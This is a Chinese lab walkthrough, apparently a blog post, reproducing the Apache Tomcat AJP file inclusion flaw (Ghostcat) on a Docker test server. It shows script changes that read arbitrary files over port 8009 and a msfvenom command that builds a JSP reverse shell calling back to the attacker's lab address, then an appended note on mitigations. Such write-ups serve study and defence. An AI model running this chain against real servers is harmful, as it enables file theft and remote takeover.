【漏洞复现】Apache Tomcat AJP文件包含漏洞(CNVD-2020-1048)

1.影响版本

Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31

2.复现

2.1准备
攻击机:kali 192.168.227.130
centos7 192.168.227.132
docker
工具:
six
2.2环境搭建
选取一个版本受影响的Tomcat,这里用Docker hub上的9.0.30版本的Tomcat镜像来复现
下载镜像

docker pull tomcat:9.0.30-jdk8-adoptopenjdk-hotspot

运行容器

docker run --rm -p 8009:8009 -p 8080:8080 -d tomcat:9.0.30-jdk8-adoptopenjdk-hotspot

在这里插入图片描述
进入容器里的/usr/local/tomcat目录, 将webapps.dist下的内容复制到webapps目录下
在这里插入图片描述

sudo docker exec -it f1fb52142e4d(容器id) /bin/bash

在这里插入图片描述

cp -r webapps.dist/* webapps/

访问8080端口,查看Tomcat是否正常运行
在这里插入图片描述

3.跨目录读取

nmap扫描
在这里插入图片描述
发现开放8009和8080端口
可用用脚本读取ROOT目录下的文件,如果想读取webapps其他目录下的文件, 可以对脚本进行简单的修改
修改脚本里的“/asdf”就可以实现跨目录读取. 比如我们要读取test目录下的test.txt

_,data = t.perform_request('/test/asdf',attributes=[

在这里插入图片描述
在webapps下的创建一个test目录, 放上一个test.txt文件
在这里插入图片描述
然后用修改后的脚本读取这个文件即可
在这里插入图片描述

4.反弹shell

如果服务器同时存在文件上传漏洞, 则可以进一步取得shell. 我们先修改一下脚本, 在“/asdf”后面加上“.jsp”即可

_,data = t.perform_request('/asdf.jsp',attributes=[

在这里插入图片描述
生成Payload, 其中192.168.227.130是攻击者地址

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.227.130 LPORT=4444 > shell.txt

设置好payload,然后开始监听
在这里插入图片描述
将shell.txt放到webapps的ROOT目录下后,运行脚本
在这里插入图片描述
附(拷贝本地文件到docker容器)
1,确定我们的容器名,并获取容器长ID

docker inspect -f '{{.ID}}' frosty_feynman

2,拷贝本地文件到容器

docker cp 你的文件路径 容器长ID:docker容器路径

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得到shell
在这里插入图片描述

  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cnvd-2020-10487-tomcat-ajp-lfi是一种利用TomcatApache JServ协议(AJP)的本地文件包含(LFI)漏洞。该漏洞允许攻击者在服务器上执行任意的文件读取和执行操作,从而可能导致敏感信息泄露、甚至服务器完全受控。 攻击者可以通过将恶意的AJP请求发送到Tomcat服务器的8009端口来利用该漏洞。这些请求可以指定要读取的文件路径。由于Tomcat默认配置下AJP协议启用且未进行适当的安全限制,攻击者可以通过这个漏洞读取和执行服务器上的任意文件。 为了防止受到cnvd-2020-10487-tomcat-ajp-lfi漏洞的攻击,可以采取以下措施: 1. 禁用或限制AJPS协议的使用:可以通过修改Tomcat的配置文件来禁用或限制AJPS协议的使用。将AJP协议暴露在公共网络上可能会使服务器容易受到攻击。 2. 更新Tomcat版本:及时安装Tomcat安全更新和补丁,以保持服务器的安全性和稳定性。 3. 配置Tomcat访问控制:通过配置Tomcat的访问控制策略,限制外部访问与敏感文件相关的路径。 4. 使用防火墙和入侵检测系统(IDS):配置防火墙和IDS以监控和检测异常的网络活动,并及时阻止和警示可疑的AJP请求。 5. 最小权限原则:确保服务器上的所有账户和进程都具有最小权限。这样,即使攻击者成功利用了漏洞,也能够最大限度地减小攻击的影响范围。 综上所述,cnvd-2020-10487-tomcat-ajp-lfi是一种危险的漏洞,但通过采取适当的防护措施,我们可以提高服务器的安全性,避免受到该漏洞的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值